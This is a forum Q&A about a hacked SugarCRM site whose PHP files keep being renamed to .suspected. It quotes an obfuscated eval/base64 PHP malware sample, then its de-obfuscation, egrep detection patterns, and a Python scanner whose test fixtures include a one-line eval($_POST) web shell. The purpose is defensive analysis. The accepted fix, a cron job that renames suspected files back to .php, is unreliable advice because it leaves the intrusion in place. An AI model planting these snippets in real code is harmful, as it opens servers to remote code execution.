
For the last 4 days we have been facing a strange issue on our production server (AWS EC2 instance), specific to only one site, which is SugarCRM.

The issue is that the file `/home/site_folder/public_html/include/MassUpdate.php` is automatically renamed to `/home/site_folder/public_html/include/MassUpdate.php.suspected`.

This happens 2-3 times a day with a gap of 3-4 hours. It occurs only for this specific site; it doesn't even occur for the staging replica of the same site. I even compared the code of that file on both sites, and it's the same.

We Googled and found that such issues occur mostly for WordPress sites and could be the result of an attack. But we checked our server for an attack and there isn't any. Also, there is no virus/malware scan running on the server.

What should we do?

Update: We found a few things after going through this link. We executed `egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/` and found that there are a few files with the following sample code.

    <?php
    function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
    $ixo="base64_decode";return $ixo($ggy);}
    $s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
    '0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
    $koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
    eval(flnftovr($s, $koicev));?>

It seems to be some malware; how do we go about removing it permanently?

Thanks

Amol Chakane
  • Maybe there is some cron function doing this. – Harshit Sep 29 '15 at 04:45
  • No there isn't such cron running. – Amol Chakane Sep 29 '15 at 04:59
  • 3
    If this is for a production app, I recommend you contact a security expert immediately. Can you check your web-server logs for any weird requests to that file immediately before its name is changed? Can you try running this from the CLI, `find . -name "*.php" -exec grep -H "eval(" {} \;`, from the public_html/ level? This will search for all PHP files that call `eval`, which may have been created by the hacker. Note you may find some false positives with this. –  Sep 29 '15 at 05:05
  • 2
    I recommend you disable any plugins for your crm too, as plugins are the most popular attack vectors for hackers. –  Sep 29 '15 at 05:06
  • @sudosoul is right, WordPress plugins are the most popular attack vectors. You may also check whether any script (Perl, Python, shell script) is doing this. – Harshit Sep 29 '15 at 05:08
  • @sudosoul I tried that command. That didn't work. But I checked the code of file, it has `eval(combo_{$varname}.jsscript(''));` this line of code. And it's there on staging site too. But that is not renamed. – Amol Chakane Sep 29 '15 at 05:27
  • There seem to be a lot of WordPress sites impacted by this issue. It positively reeks of a security vulnerability, and your machine almost certainly has been compromised, but *not* by the files renamed to *.php.suspected*. That appears to be a distraction. Sadly, though perhaps not surprisingly, most of the posts I see talk about renaming files and sometimes finding the malware, but there's virtually no discussion of the actual nature of the vulnerability that allows the original exploit to occur. If you are not running WordPress then perhaps it's a more general PHP vulnerability. – Michael - sqlbot Sep 29 '15 at 08:31
  • @Michael-sqlbot You are right. So how should we go ahead with resolving such issue? – Amol Chakane Sep 29 '15 at 08:53
  • 1
    `Also there is no virus/malware scan running on server.` Why not? This should be running. **Always**. *If you leave your doors unlocked, don't be surprised to find the neighbour's cat drinking all your milk and smoking your fags* :-p – Martin Oct 01 '15 at 12:56
  • 1
    Just create a cronjob: `#!/bin/bash cd /home/username/public_html find /home/username/public_html -type f -name '*.suspected' | while read f; do mv "$f" "${f%.suspected}"; done` – James M Jun 08 '17 at 16:05
  • 1
    @JamesMaynard Correct, that's the solution I used. – Amol Chakane Jun 12 '17 at 07:17
  • I am also getting this type of garbage code in many files, which is not WordPress; this is a simple PHP file. How can I resolve this? – Hidayt Rahman May 17 '18 at 16:59
  • @HidaytRahman I used the solution suggested by James M – Amol Chakane May 24 '18 at 06:05
  • Can you please tell me step by step? I am new. – Hidayt Rahman May 26 '18 at 07:23
  • @HidaytRahman Posted answer with details. – Amol Chakane May 30 '18 at 06:52

4 Answers

2

It's somewhat obfuscated, but I've de-obfuscated it. The function flnftovr takes a string and an array as arguments. It creates a new string $ggy using the formula

    isset($array[$string[$i]]) ? $array[$string[$i]] : $string[$i];

It then prepends base64_decode to the string.

The string is $s, the array is $koicev. It then evals the result of this manipulation. So eventually a string gets created:

    base64_decode(QGluaV9zZXQoJ2Vycm9yX2xvZycsIE5VTEwpOwpAaW5pX3NldCgnbG9nX2Vycm9ycycsIDApOwpAaW5pX3NldCgnbWF4X2V4ZWN1dGlvbl90aW1lJywgMCk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmlmKGlzc2V0KCRfU0VSVkVSKfZW5jb2RlKHNlcmlhbGl6ZSgkcmVzKSk7Cn0=)

So what actually gets run on your server is:

    @ini_set('error_log', NULL);
    @ini_set('log_errors', 0);
    @ini_set('max_execution_time', 0);
    @set_time_limit(0);

    if(isset($_SERVER)
    encode(serialize($res));
    }

If you didn't create this and you suspect your site has been hacked, I'd suggest you wipe the server, and create a new installation of whatever apps are running on your server.

Alan Apter
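The same de-obfuscation done programmatically, as an added example that is neither the asker's file nor the answerer's code: it applies the substitution table and the base64 step of the payload quoted in the question in Python and returns the result instead of executing it, which is how a responder should inspect such a file. The payload string and the table are copied verbatim from the question; the asker elided the middle of the string, so only its first part decodes to readable PHP and the tail comes out as junk. `lenient_b64decode` is my approximation of how PHP's non-strict `base64_decode` tolerates that junk.

```python
import base64
import re

# Obfuscated payload and substitution table, copied verbatim from the infected
# file quoted in the question. The asker elided the middle of the string, so the
# decoded text is clean only up to the point of the cut.
PAYLOAD = (
    'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'
    '0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'
    'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X='
)
TABLE = {
    '1': 'n', '0': '4', '3': 'y', '2': '8', '5': 'E', '4': 'H', '7': 'j', '6': 'w',
    '9': 'g', '8': 'J', 'A': 'Y', 'C': 'V', 'B': '3', 'E': 'x', 'D': 'Q', 'G': 'M',
    'F': 'i', 'I': 'P', 'H': 'U', 'K': 'v', 'J': 'W', 'M': 'G', 'L': 'L', 'O': 'X',
    'N': 'b', 'Q': 'B', 'P': '9', 'S': 'd', 'R': 'I', 'U': 'r', 'T': 'O', 'W': 'z',
    'V': 'F', 'Y': 'q', 'X': '0', 'Z': 'C', 'a': 'D', 'c': 'a', 'b': 'K', 'e': 'o',
    'd': '5', 'g': 'm', 'f': 'h', 'i': '6', 'h': 'c', 'k': 'p', 'j': 's', 'm': 'A',
    'l': 'R', 'o': 'S', 'n': 'u', 'q': 'N', 'p': 'k', 's': '7', 'r': 't', 'u': '2',
    't': 'l', 'w': 'e', 'v': '1', 'y': 'T', 'x': 'Z', 'z': 'f',
}


def substitute(text, table):
    """Equivalent of the PHP loop: map each character, pass unknown ones through."""
    return ''.join(table.get(ch, ch) for ch in text)


def lenient_b64decode(text):
    """Decode the way PHP's non-strict base64_decode does (assumption): ignore
    characters outside the alphabet, drop a dangling 6-bit tail and do not
    insist on '=' padding. Python's decoder rejects all three, so we normalise."""
    cleaned = re.sub(r'[^A-Za-z0-9+/]', '', text)
    if len(cleaned) % 4 == 1:
        cleaned = cleaned[:-1]
    cleaned += '=' * (-len(cleaned) % 4)
    return base64.b64decode(cleaned).decode('latin-1')


def deobfuscate(payload, table):
    """Return the text that eval() would have received, without running it."""
    return lenient_b64decode(substitute(payload, table))


def readable_prefix(decoded):
    """Keep only the leading run of printable text; that is all that survives
    the cut in the quoted sample, and it is what an analyst wants to read."""
    return re.match(r'[\x09\x0a\x0d\x20-\x7e]*', decoded).group(0)


if __name__ == '__main__':
    print(readable_prefix(deobfuscate(PAYLOAD, TABLE)))
```

Run against the quoted sample, the readable part is the four `@ini_set`/`@set_time_limit` lines that silence error logging and lift the execution time limit, followed by the start of a `$_SERVER` check; everything after that is lost to the elision. The point of the approach is that the substitution and decode steps are reproduced in a language that never hands the result to `eval`, so the sample can be read on an analysis machine rather than on the compromised host.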
2

The renaming of .php files to .php.suspected keeps happening today. The following commands should not come up with anything:

    find <web site root> -name '*.suspected' -print
    find <web site root> -name '.*.ico' -print

In my case, the infected files could be located with the following commands:

    cd <web site root>
    egrep -Rl '\$GLOBALS.*\\x'
    egrep -Rl -Ezo '/\*(\w+)\*/\s*@include\s*[^;]+;\s*/\*'
    egrep -Rl -E '^.+(\$_COOKIE|\$_POST).+eval.+$'

I have prepared a longer description of the problem and how to deal with it on GitHub.

Javier Elices
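A small scanner that applies the indicators collected in this thread (the `*.suspected` renames from the question, the hidden `.ico` files and the three `egrep` patterns from the answer above) to a web root, as an added Python example that is not the answerer's script. It walks the tree, reports which indicator each file tripped, and exercises itself against a constructed sample tree written to a temporary directory so the result can be checked offline. The indicator labels, the sample file names and their contents are my own, chosen only to trip each pattern once.

```python
import os
import re
import tempfile

# Indicators from this thread: files renamed to *.suspected, hidden .ico files,
# and the three egrep patterns in the answer above as Python regexes.
NAME_INDICATORS = {
    "renamed-to-suspected": re.compile(r"\.suspected$"),
    "hidden-ico": re.compile(r"^\..*\.ico$"),
}
CONTENT_INDICATORS = {
    "globals-hex-escapes": re.compile(r"\$GLOBALS.*\\x"),
    "comment-wrapped-include": re.compile(r"/\*(\w+)\*/\s*@include\s*[^;]+;\s*/\*"),
    "request-param-eval": re.compile(r"^.+(\$_COOKIE|\$_POST).+eval.+$", re.MULTILINE),
}
MAX_BYTES = 2 * 1024 * 1024  # skip large media; the droppers seen here are tiny


def scan_tree(root):
    """Walk root and return sorted (relative_path, indicator) pairs."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            for label, pattern in NAME_INDICATORS.items():
                if pattern.search(name):
                    findings.append((rel, label))
            if os.path.getsize(path) > MAX_BYTES:
                continue
            # latin-1 never fails to decode, so binary junk cannot abort the scan
            with open(path, "r", encoding="latin-1") as fh:
                text = fh.read()
            for label, pattern in CONTENT_INDICATORS.items():
                if pattern.search(text):
                    findings.append((rel, label))
    return sorted(findings)


def build_sample_tree(root):
    """Write a constructed web root: four files that should trip one indicator
    each (one trips two) and one clean file that should not."""
    samples = {
        "include/MassUpdate.php.suspected": "<?php // original file, renamed by the intruder\n",
        "wp-content/.cache.ico": "<?php $GLOBALS['_x'] = '" + r"\x62\x61\x73\x65" + "';\n",
        "wp-content/index.php": "<?php /*a1b2*/ @include \"wp-content/.cache.ico\"; /*a1b2*/\n",
        "include/upload.php": "<?php\nif(isset($_POST['c'])) eval($_POST['c']);\n",
        "include/Clean.php": "<?php\nfunction mass_update($rows) { return count($rows); }\n",
    }
    for rel, content in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(content)
    return root


def demo():
    """Build the constructed tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, label in demo():
        print(f"{label:24} {rel}")
```

Point `scan_tree` at the real web root to get the same report for a live site. Like the `egrep` one-liners it reproduces, this is a first pass: a hit means the file needs reading, and a clean scan does not mean the host is clean, since the thread itself shows the renamed file is a side effect rather than the entry point.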
2

Renaming PHP files to php.suspected is usually intentional and done by the hacker's script. They change the file extension to give the impression that the file was checked by some anti-malware software, is secure and can't be executed. But, in fact, it isn't. They change the extension to "php" any time they want to invoke the script and afterwards change the extension back to "suspected". You can read about it at Sucuri Research Labs.

Maybe this post is old but the topic is still alive, especially given the June 2019 malware campaign targeting WordPress plugins. I found a few "suspected" files in my client's WordPress subdirectories (e.g. wp-content).

0

Posting this answer, it may help others.

  1. Create a file with a '.sh' extension at a convenient location.
  2. Add the following code to it.

    #!/bin/bash
    # Rename your_file_name.php.suspected back to your_file_name.php
    mv /<path_to_your_file>/your_file_name.php.suspected /<path_to_your_file>/your_file_name.php

  3. Save this file.
  4. Set a cron for every 10 minutes (or whatever interval you need), using the following line in crontab:

    */10 * * * * path_to_cron_file.sh

  5. Restart the cron service.

You will find plenty of documentation on creating cron jobs on Google.

Amol Chakane